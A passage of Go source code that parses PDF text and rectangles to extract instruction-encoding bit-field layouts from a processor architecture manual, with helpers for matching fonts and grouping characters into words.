for i < len(text) && match(text[i], "Times-Roman", 8, "") {
if y2 == 0 {
y2 = text[i].Y
}
if x1 == 0 {
x1 = text[i].X
}
i++
}
// bit fields in box
y1 := 0.0
dy1 := 0.0
for i < len(text) && match(text[i], "Times-Roman", 9, "") {
if x2 < text[i].X+text[i].W {
x2 = text[i].X + text[i].W
}
y1 = text[i].Y
dy1 = text[i].FontSize
i++
}
if debugPage > 0 {
fmt.Println("encoding box", x1, y1, x2, y2)
}
// Find lines (thin rectangles) separating bit fields.
var bottom, top pdf.Rect
const (
yMargin = 0.25 * 72
xMargin = 2 * 72
)
for _, r := range content.Rect {
if r.Max.Y-r.Min.Y < 2 && x1-xMargin < r.Min.X && r.Min.X < x1 && x2 < r.Max.X && r.Max.X < x2+xMargin {
if y1-yMargin < r.Min.Y && r.Min.Y < y1 {
bottom = r
}
if y1+dy1 < r.Min.Y && r.Min.Y < y2 {
top = r
}
}
}
if debugPage > 0 {
fmt.Println("top", top, "bottom", bottom)
}
const ε = 0.1 * 72
var bars []pdf.Rect
for _, r := range content.Rect {
if r.Max.X-r.Min.X < 2 && math.Abs(r.Min.Y-bottom.Min.Y) < ε && math.Abs(r.Max.Y-top.Min.Y) < ε {
bars = append(bars, r)
}
}
sort.Sort(RectHorizontal(bars))
// There are 16-bit and 32-bit encodings.
// In practice, they are about 2.65 and 5.3 inches wide, respectively.
// Use 4 inches as a cutoff.
nbit := 32
dx := top.Max.X - top.Min.X
if top.Max.X-top.Min.X < 4*72 {
nbit = 16
}
total := 0
var buf bytes.Buffer
for i := 0; i < len(bars)-1; i++ {
if i > 0 {
fmt.Fprintf(&buf, "|")
}
var sub []pdf.Text
x1, x2 := bars[i].Min.X, bars[i+1].Min.X
for _, t := range content.Text {
tx := t.X + t.W/2
ty := t.Y + t.FontSize/2
if x1 < tx && tx < x2 && y1 < ty && ty < y2 {
sub = append(sub, t)
}
}
var str []string
for _, t := range findWords(sub) {
str = append(str, t.S)
}
s := strings.Join(str, " ")
s = strings.Replace(s, ")(", ") (", -1)
n := len(strings.Fields(s))
b := int(float64(nbit)*(x2-x1)/dx + 0.5)
if n == b {
for j, f := range strings.Fields(s) {
if j > 0 {
fmt.Fprintf(&buf, "|")
}
fmt.Fprintf(&buf, "%s", f)
}
} else {
if n != 1 {
fmt.Fprintf(os.Stderr, "%s - %s - multi-field %d-bit encoding: %s\n", name, syntax, n, s)
}
fmt.Fprintf(&buf, "%s:%d", s, b)
}
total += b
}
if total != nbit || total == 0 {
fmt.Fprintf(os.Stderr, "%s - %s - %d-bit encoding\n", name, syntax, total)
}
return buf.String(), i
}
type RectHorizontal []pdf.Rect
func (x RectHorizontal) Swap(i, j int) { x[i], x[j] = x[j], x[i] }
func (x RectHorizontal) Less(i, j int) bool { return x[i].Min.X < x[j].Min.X }
func (x RectHorizontal) Len() int { return len(x) }
func checkNoEncodings(num int, text []pdf.Text) {
for _, t := range text {
if match(t, "Helvetica-Bold", 9, "Encoding") {
fmt.Fprintf(os.Stderr, "page %d: unexpected encoding: %s\n", num, t.S)
}
}
}
func match(t pdf.Text, font string, size float64, substr string) bool {
return t.Font == font && math.Abs(t.FontSize-size) < 0.1 && strings.Contains(t.S, substr)
}
func findWords(chars []pdf.Text) (words []pdf.Text) {
// Sort by Y coordinate and normalize.
const nudge = 1
sort.Sort(pdf.TextVertical(chars))
old := -100000.0
for i, c := range chars {
if c.Y != old && math.Abs(old-c.Y) < nudge {
chars[i].Y = old
} else {
old = c.Y
}
}
// Sort by Y coordinate, breaking ties with X.
// This will bring letters in a single word together.
sort.Sort(pdf.TextVertical(chars))
// Loop over chars.
for i := 0; i < len(chars); {
// Find all chars on line.
j := i + 1
for j < len(chars) && chars[j].Y == chars[i].Y {
j++
}
var end float64
// Split line into words (really, phrases).
for k := i; k < j; {
ck := &chars[k]
s := ck.S
end = ck.X + ck.W
charSpace := ck.FontSize / 6
wordSpace := ck.FontSize * 2 / 3
l := k + 1
for l < j {
// Grow word.
cl := &chars[l]
if sameFont(cl.Font, ck.Font) && math.Abs(cl.FontSize-ck.FontSize) < 0.1 && cl.X <= end+charSpace {
s += cl.S
end = cl.X + cl.W
l++
continue
}
// Add space to phrase before next word.
if sameFont(cl.Font, ck.Font) && math.Abs(cl.FontSize-ck.FontSize) < 0.1 && cl.X <= end+wordSpace {
s += " " + cl.S
end = cl.X + cl.W
l++
continue
}
break
}
f := ck.Font
f = strings.TrimSuffix(f, ",Italic")
f = strings.TrimSuffix(f, "-Italic")
words = append(words, pdf.Text{f, ck.FontSize, ck.X, ck.Y, end - ck.X, s})
k = l
}
i = j
}
return words
}
func sameFont(f1, f2 string) bool {
f1 = strings.TrimSuffix(f1, ",Italic")
f1 = strings.TrimSuffix(f1, "-Italic")
f2 = strings.TrimSuffix(f1, ",Italic")
f2 = strings.TrimSuffix(f1, "-Italic")
return strings.TrimSuffix(f1, ",Italic") == strings.TrimSuffix(f2, ",Italic") || f1 == "Symbol" || f2 == "Symbol" || f1 == "TimesNewRoman" || f2 == "TimesNewRoman"
}
var jsFix = strings.NewReplacer(
// `\u003c`, `<`,
// `\u003e`, `>`,
// `\u0026`, `&`,
// `\u0009`, `\t`,
)
func printTable(name string, table []Inst) {
_ = strconv.Atoi
}
| parsePage |
Subsets and Splits